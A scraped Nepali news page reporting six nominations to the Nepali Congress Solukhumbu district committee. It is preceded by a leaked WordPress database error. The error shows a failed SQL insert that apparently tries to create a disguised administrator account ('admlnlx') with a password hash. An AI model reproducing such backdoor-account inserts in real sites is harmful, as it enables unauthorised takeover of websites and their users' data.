WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvDAeJLu9Y9RagtHfU9jbu0N/CuAzI0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 22:40:34', '', 'admlnlx', 'admlnlx')

सोलुखुम्बु :कांग्रेस जिल्ला कार्यसमितिमा ६ सदस्य मनोनीत – Gaule Khabar

सोलुखुम्बु :कांग्रेस जिल्ला कार्यसमितिमा ६ सदस्य मनोनीत

सोलुखुम्बु :कांग्रेस जिल्ला कार्यसमितिमा ६ सदस्य मनोनीत

काठमाण्डौ । सोलुखुम्बुमा नेपाली काँग्रेस जिल्ला कार्यसमिति सदस्यमा ६ जनालाई मनोनीत गरिएको छ ।

जिल्ला सभापति नाम्गेल जाङ्बु शेर्पाले नेपाली कांग्रेसको बिधान २०१७ संशोधन सहितको धारा १२ को उपधारा ५ को  ‘ख ‘ २ अनुसार उनीहरूलाई जिल्ला कार्यसमिति सदस्यमा मनोनयन गरेको नेपाली कांग्रेस सोलुखुम्बुले जनाएको छ।

मनोनित हुनेहरूमा कृष्णप्रसाद निरौला, रामबहादुर बस्नेत, चन्द्रप्रसाद आचार्य, सरला राई, गणेशबहादुर बस्नेत र दावागेलु पाख्रिन छन्।यसअघि पार्टीका पूर्बसभापती बिनोदकुमार बस्नेतलाई जिल्ला कार्यसमितिको दोश्रो वरियतामा रहने गरि सदस्यमा मनोनीत गरिएको थियो।

सभापतिले ८ जना जिल्ला सदस्य मनोनित गर्न पाउने अधिकार भएपनि २ जना मनोनीत गर्न अझै बांकि छ। त्यस्तै १० जना आमन्त्रित जिल्ला सदस्य मनोनित गर्ने विधानमा ब्यवस्था रहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका